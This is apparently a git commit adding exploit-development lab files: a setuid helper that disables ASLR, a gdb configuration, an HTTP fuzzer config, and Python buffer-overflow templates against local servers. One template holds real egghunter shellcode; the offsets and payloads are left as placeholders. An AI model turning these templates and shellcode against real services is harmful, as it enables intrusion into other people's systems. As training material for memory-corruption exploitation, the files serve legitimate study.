Add files via upload

2024-11-10 05:34:12 +00:00 · 2022-02-21 11:25:45 -05:00 · 2022-02-21 11:25:45 -05:00 · f7f9524190
commit f7f9524190
parent 0940710459
8 changed files with 115 additions and 0 deletions
--- a/exploit_development/aslr_changer
+++ b/exploit_development/aslr_changer
--- a/exploit_development/aslr_changer.c
+++ b/exploit_development/aslr_changer.c
@ -0,0 +1,29 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+int main(int argc, char *argv[]) {
+    FILE *fp;
+    char buff[100];
+    
+    if(seteuid(0) == -1) {
+        fprintf(stderr, "Failed to set UID to root - is this binary setuid root?\n");
+        return -1;
+    }
+    
+    if(argc != 2 || (strcmp(argv[1], "0") != 0 && strcmp(argv[1], "2") != 0)) {
+        fprintf(stderr, "Usage: %s [0 or 2]\nSets randomize_va_space to 0 (ASLR off) or 2 (ASLR on)\n", argv[0]);
+        return -1;
+    }
+    
+    fp = fopen("/proc/sys/kernel/randomize_va_space", "w");
+    fprintf(fp, "%s\n", argv[1]);
+    fclose(fp);
+    
+    fp = fopen("/proc/sys/kernel/randomize_va_space", "r");
+    fgets(buff, 99, fp);
+    fclose(fp);
+    
+    printf("randomize_va_space is now %s", buff);
+    return 0;
+}
--- a/exploit_development/chatserver-smallbuffer
+++ b/exploit_development/chatserver-smallbuffer
--- a/exploit_development/gdbinit.txt
+++ b/exploit_development/gdbinit.txt
@ -0,0 +1,4 @@
+source /root/s5/archive/peda-master/peda.py
+set disassembly-flavor intel
+set follow-fork-mode parent
+#source /root/.gdbinit-gef.py
--- a/exploit_development/httpdpost.fuzzer
+++ b/exploit_development/httpdpost.fuzzer
@ -0,0 +1,13 @@
+outbound fuzz 'POST /arbitrarydataarbitrarydataarbitrarydataarbitrarydata\r\n\r\n\n'
+# String to match in the response
+inbound '404'
+# What port the fuzzer tries to connect to
+port 8080
+# What protocol to use
+proto tcp
+# How long to wait on a response
+receiveTimeout 1
+# How long to wait between retrying test cases
+failureTimeout 5
+# Number of times to retry a test case
+failureThreshold 3
--- a/exploit_development/libhttpd
+++ b/exploit_development/libhttpd
--- a/exploit_development/sockets_example.py
+++ b/exploit_development/sockets_example.py
@ -0,0 +1,26 @@
+import socket
+import sys
+import threading
+import struct
+
+IP = "127.0.0.1"
+PORT=8080
+
+jmpesp = ????
+offset = ????
+
+buf = ????
+
+payload = ????
+payload = "POST %s\r\n\r\n" % payload
+
+sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+sock.settimeout(2)
+sock.connect((IP,PORT))
+sock.send(payload)
+print "Buffer sent! (len %d)" % len(payload)
+try:
+    print sock.recv(4096)
+    print "No crash...."
+except:
+    print "Server died, Yayyyy!!"
--- a/exploit_development/triple_socket_template.py
+++ b/exploit_development/triple_socket_template.py
@ -0,0 +1,43 @@
+#!/usr/bin/python
+import os
+import socket
+import sys
+import threading
+import struct
+import time
+
+HOST="127.0.0.1"
+PORT=2501
+
+# Matt Miller Access() egghunter, triggers on "W00TW00T"
+egghunter = "\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\x31\xc9\xcd\x80\x3c\xf2\x74\xec\xb8\x57\x30\x30\x54\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
+egghunterPayload = ?
+msgPayload = ?
+
+# Connect one user
+sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock1.connect((HOST, PORT))
+sock1.send("usr1\r\n")
+sock1.recv(1024)
+print "Connected first user"
+
+# Connect a second user and message the first with the egg
+sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock2.connect((HOST, PORT))
+sock2.send("usr2\r\n")
+sock2.recv(1024)
+time.sleep(1)
+print "Connected second user"
+sock2.send(msgPayload)
+print "Sent msg payload"
+
+# Connect a final user to trigger egghunter in username
+sock3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock3.connect((HOST, PORT))
+sock3.send(egghunterPayload)
+print "Sent egghunter payload"
+
+# Close down
+sock3.close()
+sock2.close()
+sock1.close()